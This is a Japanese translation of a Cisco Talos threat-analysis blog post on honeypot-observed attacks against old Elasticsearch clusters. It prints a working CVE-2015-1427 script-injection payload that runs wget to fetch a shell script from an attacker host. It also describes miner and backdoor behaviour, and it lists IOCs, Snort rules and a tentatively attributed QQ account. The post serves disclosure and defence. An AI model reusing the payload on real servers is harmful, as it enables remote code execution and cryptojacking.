Cisco Japan Blog
Share

Cisco Talos によるハニーポット分析で、Elasticsearch クラスタへの攻撃の増加が明らかに


2019年3月12日


エグゼクティブ サマリー

Cisco Talos では、保護されていない Elasticsearch クラスタに対して注意喚起を促してきました。そうした中、Elasticsearch クラスタを狙った複数人物による攻撃が最近になって急増しています。これらの攻撃手口では、バージョン 1.4.2 以前のクラスタに存在する古い脆弱性をエクスプロイトすることで、検索クエリにスクリプトを渡してペイロードを読み込ませようと試みます。攻撃スクリプトは、標的のマシンにマルウェアと暗号通貨マイナーの両方をインストールします。攻撃者の 1 人に関しては、Talos による追跡で SNS アカウントが特定されました。Elasticsearch は主に大規模なデータセットの管理に使用されます。そのためクラスタへの攻撃が成功した場合、データの規模に応じて甚大な影響を受ける可能性があります。この記事では、それぞれの手口と、関連するペイロードについて詳しく説明します。

はじめに

ハニーポット トラフィックを継続的に分析した結果、保護されていない Elasticsearch クラスタを標的とした攻撃の増加が観察されました。これらの攻撃は CVE-2014-3120 と CVE-2015-1427 の脆弱性を突いています。どちらも古いバージョンの Elasticsearch にのみ存在し、エクスプロイトすることで検索クエリにスクリプトを渡すことができます。ペイロードとエクスプロイト チェーンのパターンを踏まえる限り、Talos のハニーポットへの攻撃では 6 人の攻撃者が関わっていると考えられます。

  例CVE-2015-1427:
     {
        "size": 1,
         "script_fields": {
            "lupin":{
             "script":java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget
                http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\").getText()"
          }
        }
      }

最も活発な攻撃者(以下、1 人目の攻撃者)は常に CVE-2015-1427 の脆弱性を狙い、最初の攻撃で必ず 2 つの異なるペイロードを展開します。一方のペイロードは bash スクリプトをダウンロードするために wget を呼び出します。他方のペイロードは難読化された Java コードを使用して bash を呼び出し、wget を使って同じ bash スクリプトをダウンロードします。これはおそらく、多様なプラットフォームでエクスプロイトを成功させるための試みです。攻撃者が利用する bash スクリプトは、RSA キーを authorized_keys ファイルに格納する前にセキュリティ保護を無効にし、他の悪質なプロセス(主に他のマイニング マルウェア)を停止させます。これは同様の攻撃で一般的に見られるパターンです。同じ bashスクリプトは、不正なマイニング ソフトウェアや設定ファイルをダウンロードし、シェル スクリプトを cron ジョブとしてインストールすることで永続性を確保します。

この bash スクリプトは、UPX で圧縮された ELF 実行ファイルもダウンロードします。解凍されたサンプルを分析すると、実行ファイルには幅広いシステムに対するエクスプロイト コードが含まれていることがわかります。これらのエクスプロイトは、すべてリモート コードの脆弱性(Drupal の CVE-2018-7600、Oracle WebLogic の CVE-2017-10271、Spring Data Commons の CVE-2018-1273 など)を突いています。エクスプロイト コマンドは通常、HTTPS 経由で標的のシステムに送信されます。今回のサンプルを分析すれば明らかですが、攻撃者の目的は、標的のシステムでコードの実行権限を入手することです。ただしペイロード サンプルの詳細な分析は今も続いているため、更新情報があれば追ってお伝えします。

2 人目の攻撃者は CVE-2014-3120 の脆弱性を突くことで、サービス拒否型マルウェア「BillGates」から派生したペイロードを配布しようと試みています。Talos では以前にもハニーポットで「BillGates」を検出していますが、当時と違い、今は大多数の攻撃者が DDoS マルウェアから不正マイニング ソフトウェアに移行しています。そのため、「BillGates」の再出現は注目に値します。

3 人目の攻撃者は CVE-2014-3120 の脆弱性を突くことで、HTTP ファイル サーバから「LinuxT」という名前のファイルをダウンロードしようと試みます。「LinuxT」ファイルは、もはやコマンド&コントロール(C2)サーバでホストされていません。ただしエクスプロイト段階では今も「LinuxT」ファイルが要求されているほか、同じ C2 サーバでは現在も他の不正ファイルがホストされています。これらのファイルはすべて、ClamAV によってトロイの木馬「 Spike」の亜種として検出されました。いずれも x86、MIPS、ARM の各アーキテクチャで動作するように設計されているのが特徴です。

調査の中で発見した別の点は、「LinuxT」サンプルのダウンロードが試みられたホストの一部が、”echo ‘qq952135763.'” のコマンドを実行するペイロードもホストしていたことです。このパターンは、数年前の Elasticsearch エラー ログでも確認されていました。このコマンドは QQ(中国で人気のソーシャル メディア)のアカウントを参照している可能性があります。アカウント番号 952135763 の公開情報を簡単に確認したところ、サイバー セキュリティやエクスプロイトに関連するいくつかの投稿が見つかりました。ただしいずれも、今回の攻撃に関連するものではありません。これらの公開情報は攻撃者について知る糸口になる可能性もありますが、現時点では確固たる結論を引き出すのに情報が不十分です。

上記の QQ アカウント番号から特定された、攻撃者の個人プロファイル。

 

この Web サイトは、攻撃者である可能性のあるユーザの Gitee ページにもリンクしています。「Gitee」は中国系のコード共有サイトで、Github や Atlassian と同様のサービスです。

攻撃者の「Gitee」ページ。

攻撃者の Gitee プロジェクトには明確な悪意が確認されませんでした。ただし Talos では、上述の QQ アカウントを基に、中国のハッキング フォーラム「xiaoqi7」上で攻撃者のプロファイルを特定したほか、他のフォーラムでもエクスプロイトやマルウェアに関連する過去の投稿を追跡しています。QQ アカウント番号(952135763)の公開情報を簡単に確認した結果、サイバー セキュリティやエクスプロイトに関連するいくつかの投稿が見つかりました。ただしいずれも、今回の攻撃に関連するものではありません。これらの公開情報は攻撃者について知る糸口になる可能性もありますが、現時点では確固たる結論を引き出すのに情報が不十分です。

他にも Talos のハニーポットでは、Elasticsearch のエクスプロイトに使われる他のホストが検出されています。これらのホストからは、”echo ‘qq952135763′” と “echo ‘952135763,’” の両コマンドを実行するためのペイロードが配信されていました。ただし各攻撃に関連する IP アドレスでは、攻撃者による「LinuxT」ペイロードのダウンロード試行が確認されていません。さらに、同じ人物による他の攻撃では Elasticsearch の古い脆弱性を突いていましたが、今回の攻撃では比較的新しい脆弱性をエクスプロイトしています。

Talos が特定した他の 3 人の攻撃者については、エクスプロイトによるマルウェアの配布行為が確認されていません。1 人の攻撃者は “rm *” コマンドを発行し、他の 2 人の攻撃者は ‘whoami’ と ‘id’ のコマンドを発行することで脆弱なサーバをフィンガープリントしています。

まとめ

Talos の Elasticsearch ハニーポットでは、CVE-2014-3120 および CVE-2015-1427 の脆弱性を突いて多様なペイロードの配布を狙う攻撃者が複数確認されました。また、「LinuxT」ペイロードを配布したマルウェアについては、攻撃者との関連性が疑われる SNS アカウントをいくつか特定しています。今回の Elasticsearch の脆弱性はバージョン 1.4.2 以前にのみ存在します。最新バージョンの Elasticsearch を実行しているクラスタは、これらの脆弱性による影響を受けません。これらのクラスターに含まれるデータセットの規模や機密性を考えると、脆弱性がエクスプロイトされた場合は甚大な被害を被る可能性があります。影響を受けるバージョンをお使いであれば修正プログラミングを適用し、可能であれば最新版にアップグレードすることを強く勧めます。同時に、検索クエリを介してスクリプトを送信する十分な必要性がない限り、この機能を無効にしておくことも強く推奨されます。

カバレッジ

脆弱性のエクスプロイトは、以下の SNORT? ルールにより検出可能です。今後、脆弱性に関する新たな情報が追加されるまでの間は、ルールが追加されたり、現行のルールが変更されたりする場合がありますのでご注意ください。最新のルールの詳細については、Firepower Management Center または Snort.org を参照してください。

CVE-2014-3120: 33830, 36256, 44690

CVE-2015-1427: 33814,36067

CVE-2017-10271: 45304

CVE-2018-7600: 46316

CVE-2018-1273: 46473

 

お客様がこの脅威を検出してブロックできる別の方法を以下に記載します。

Advanced Malware Protection(AMP)は、これらの攻撃者によるマルウェアの実行の阻止に最適です。

Cisco クラウド Web セキュリティ(CWS)または Web セキュリティ アプライアンス(WSA)の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、これらの攻撃で使用されるマルウェアを検出します。

電子メール セキュリティは、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。

次世代ファイアウォール(NGFW)、次世代侵入防止システム(NGIPS)、およびMeraki MX などのネットワーク セキュリティ アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。

AMP Threat Grid は、悪意のあるバイナリを特定し、すべてのシスコ セキュリティ製品に保護機能を埋め込みます。

シスコのセキュア インターネット ゲートウェイ(SIG)である Umbrellapopup_icon は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。

シスコのセキュア インターネット ゲートウェイ(SIG)である Umbrella は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。

IOC(侵入の痕跡):

最初の攻撃者:

攻撃元の IP アドレス:

101[.]200[.]48[.]68
117[.]205[.]7[.]194
107[.]182[.]183[.]206
124[.]43[.]19[.]159
139[.]99[.]131[.]57
179[.]50[.]196[.]228
185[.]165[.]116[.]144
189[.]201[.]192[.]242
191[.]189[.]30[.]112
192[.]210[.]198[.]50
195[.]201[.]169[.]194
216[.]15[.]146[.]34
43[.]240[.]65[.]121
45[.]76[.]136[.]196
45[.]76[.]178[.]34
52[.]8[.]60[.]118
54[.]70[.]161[.]251
139[.]159[.]218[.]82

マルウェアのホスト先の IP アドレスとポート:

45[.]76[.]122[.]92:8506
207[.]148[.]70[.]143:8506

配信されたマルウェアの SHA256

bbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c
2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123
9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90
7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3

2 人目の攻撃者:

攻撃元の IP アドレス:

202[.]109[.]143[.]110

マルウェアのホスト先の IP アドレスとポート:

216[.]176[.]179[.]106:9090

配信されたマルウェアの SHA256

bbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415

3 人目の攻撃者:

攻撃元の IP アドレス:

125[.]231[.]139[.]75
36[.]235[.]171[.]244

QQ アカウントにリンクされているがマルウェアを配信していない IP アドレス:

121[.]207[.]227[.]84
125[.]77[.]30[.]184

マルウェアのホスト先の IP アドレスとポート:

104[.]203[.]170[.]198:5522

上記の IP アドレスでホストされていたマルウェアの SHA256

7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a

他の攻撃者:

攻撃元の IP アドレス:

111[.]19[.]78[.]4
15[.]231[.]235[.]194
221[.]203[.]81[.]226
111[.]73[.]45[.]90
121[.]207[.]227[.]84
125[.]77[.]30[.]184

本稿は 2019年2月26日に Talos Grouppopup_icon のブログに投稿された「Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusterspopup_icon」の抄訳です。

Tags:
コメントを書く